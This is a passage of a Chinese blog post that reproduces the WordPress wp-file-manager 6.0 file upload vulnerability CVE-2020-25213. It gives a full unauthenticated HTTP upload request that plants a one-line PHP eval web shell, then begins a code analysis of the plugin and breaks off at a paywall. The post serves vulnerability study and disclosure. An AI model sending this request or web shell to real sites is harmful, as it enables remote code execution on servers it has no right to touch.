WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213

最新推荐文章于 2024-04-08 15:48:14 发布
最新推荐文章于 2024-04-08 15:48:14 发布
阅读量774 收藏
点赞数
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/132851717
版权
本文详细介绍了WordPress插件wp-file-manager 6.0的一个安全漏洞,该漏洞允许攻击者通过特定请求上传并执行一句话木马。通过逆向分析,揭示了漏洞涉及的函数和类,如elFinderVolumeLocalFileSystem类的_save方法,以及如何利用这些漏洞进行文件复制到可访问的WEB路径。修复此问题的关键在于防止未经授权的文件上传。
摘要由CSDN通过智能技术生成

1.漏洞复现

WordPress 6.2

插件:wp-file-manager 6.0,File Manager (advanced view) – WordPress plugin | WordPress.org (https://wordpress.org/plugins/wp-file-manager/advanced/)

复现

后台,安装、启动插件

前台,提交请求包:

POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 424
Content-Type: multipart/form-data; boundary=------------------------52d91370b674307b
 
--------------------------52d91370b674307b
Content-Disposition: form-data; name="cmd"
 
upload
--------------------------52d91370b674307b
Content-Disposition: form-data; name="target"
 
l1_
--------------------------52d91370b674307b
Content-Disposition: form-data; name="upload[]"; filename="shell.php"
Content-Type: application/octet-stream
 
<?php @eval($_POST[1]);?>
--------------------------52d91370b674307b--

访问一句话木马:http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/files/shell.php

2.逆向分析

从敏感函数逆向分析

elFinderVolumeLocalFileSystem类

敏感函数 copy 位于 elFinderVolumeLocalFileSystem类 的 _save方法

/wp-content/plugins/wp-file-manager/lib/php/elFinderVolumeLocalFileSystem.class.php

protected function _save($fp, $dir, $name, $stat)
{
  $path = $this->_joinPath($dir, $name);
 
  $meta = stream_get_meta_data($fp);
  $uri = isset($meta['uri']) ? $meta['uri'] : '';
  if ($uri && !preg_match('#^[a-zA-Z0-9]+://#', $uri) && !is_link($uri)) {
最低0.47元/天 解锁文章
红队蓝军
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress插件File-Manager任意文件上传漏洞复现(CVE-2020-25213
千寻的博客
01-26 1898
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞点复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
漏洞复现】WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 1013
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
CVE-2020-25213-WordPress
02-08
wordpress
wordpress漏洞_Wordpress File-manager 任意文件上传漏洞复现
weixin_39960793的博客
12-12 1961
一、漏洞介绍软件及漏洞简介:wordpress File Manager插件 是最强悍和便利的WordPress文件管理插件,可以直接在WordPress后台管理你网站的所有文件,可以完全替代FTP,甚至功能要比FTP还要丰富,可以在线上传、下载、压缩、解压、查看、编辑文件等。WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordP...
CVE-2020-25213 —— WordPress wp-file-manager 文件上传漏洞
战神/calmness的博客
12-10 8490
CVE-2020-25213 | WordPress wp-file-manager 文件上传漏洞 WordPress 插件WP-file-manager介绍 WP-file-manager是一个帮助WordPress管理员管理其站点上文件的插件。该插件包含一个附加库elFinder,它是一个开放源代码文件管理器,用来创建简单的文件管理界面,并提供文件管理器背后的核心功能。WP-file-manager插件以引入漏洞的方式使用了该库。 描述 WordPress 6.9之前的文件管理器(wp-fi
wordpress漏洞上传php文件夹,WordPress Asset-Manager PHP文件上传漏洞
weixin_39517054的博客
04-04 231
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistribution and co...
WordPress文件管理器插件0day漏洞解析-CVE-2020-25213
ordar123的博客
09-16 2198
WordPress文件管理器插件0day漏洞解析 昨天好多安全平台发布了WordPress插件WP File Manager的0day漏洞预警,然后我怀着好奇的心情解析了一波,花了些时间总算是解开了这个漏洞的神秘面纱。 从预警中可以看到漏洞在/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php,然后里面的 关键代码说实话我一开始没看懂,大概意思就是两个文件包含,然后下面run elFinder。 为了弄懂这个我下载了WP Fil
CVE-2020-25213-wp-filemanager-plugin
ordar123的博客
01-07 681
#!/usr/bin/python3 # -*- encoding: utf-8 -*- # @Time : 2020/11/27 9:41 # @Author : ordar # @File : wp_filemanager_rce.py # @Project : pythonCourse # @Python : 3.7.5 import base64 import threading from collections import OrderedDict from po
WordPress File Manager < 6.9 RCE(CVE-2020-25213漏洞复现
帅醉了的博客
09-28 1723
影响版本: WordPress File Manager < 6.9 最开始被坑,找了这个下载链接,卡还下载不了。 https://plugins.svn.wordpress.org/wp-file-manager/tags/5.9/ 后来发现官网有提供下载链接 https://wordpress.org/plugins/wp-file-manager/advanced/ 由于没有wordpress,也是从零开始。安装多次终于成功 访问 http://192.168.202.134/wordp
php3.13登陆漏洞,CVE-2020-25213漏洞在野利用
weixin_39679061的博客
03-19 167
2020年12月,Unit 42研究人员发现有攻击者尝试利用WordPress File Manager(文件管理器)插件中的文件上传漏洞。攻击者成功利用该漏洞可以以任意文件名和扩展上传任意文件,引发目标web 服务器上的远程代码执行。攻击者利用该漏洞利用来安装webshell,然后该webshell 被用来安装Kinsing恶意软件,该恶意软件会从H2miner 家族运行恶意加密货币挖矿机。Ki...
2024年8+最佳WordPress文件管理器插件
WP站长
04-08 1136
文件管理器是一种软件应用程序或工具,允许用户导航、组织和操作计算机或数字存储设备上的文件和文件夹。它通常提供图形用户界面,使执行常见文件操作(例如复制、移动、删除、重命名和查看文件)变得更加容易。文件管理器对于高效管理和访问文件至关重要,并且是现代操作系统的核心组件,包括 Windows 上的 Windows 资源管理器、macOS 上的 Finder 以及 Linux 上的各种文件管理器。此外,基于 Web 的文件管理器可用于管理远程服务器上或 WordPress 等内容管理系统内的文件。
泛微e-office文件上传漏洞(CNVD-2021-49104)
weixin_42345596的博客
11-29 3501
漏洞描述 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 FOFA 语法 app="泛微-EOffice" 影响版本 泛微 e-office v9.0 漏洞复现 poc POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host:x.x.x.x:port User-Agent: M
wordpress4.9漏洞
小小猪的博客
12-01 8211
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
.exp文件_wordpress插件filemanager任意文件上传漏洞复现(附EXP)
weixin_39980711的博客
11-27 545
我认为人不但要有科学、技术,还要有文化、艺术跟音乐。钱老前言wordpress往往在插件暴漏出漏洞,这里是举例 file-manager 6.0-6.8 暴露的任意文件上传漏洞,由于对上传的文件没有严格的过滤导致出现缺陷。环境搭建这里的 phpstudy 使用的组件版本如下:Apache2.4.39MySQL5.7.26PHP7.3.4nts注:PHP的版本尽量不要太低,不然安装 wor...
Matlab 使用笔记(本人出品,必属精品)
热门推荐
一些笔记
05-13 3万+
此篇博客记录了一些Matlab 的使用技巧,出于方便自己以后查阅之目的,感兴趣的朋友可以看看,本人会不定期更新的。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 873
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5419
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
CVE-2020-0796补丁
最新发布
07-03
CVE-2020-0796是一个安全漏洞的标识符,通常由Common Vulnerabilities and Exposures(公共漏洞及暴露)项目维护。这个特定的漏洞可能涉及到不同的软件产品或服务,但一般来说,它是对某个软件系统的一个严重弱点,可能导致未经授权的访问、数据泄露或其他形式的安全威胁。 CVE-2020-0796补丁是指针对这一漏洞的具体修复程序。开发商发布该补丁是为了修补源代码中的缺陷,防止攻击者利用已知的漏洞执行恶意活动。安装此补丁后,系统会增强安全性,使用户能够避免因CVE-2020-0796导致的潜在风险。 要了解CVE-2020-0796的具体细节,比如它影响的是哪个软件、其影响范围和严重程度,以及如何下载和应用补丁,你需要查看相关的官方公告、厂商发布的安全更新说明或者是网络安全专业网站的报告。如果你的操作系统或应用程序受到影响,应尽快获取并安装相应的补丁,以保障系统的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值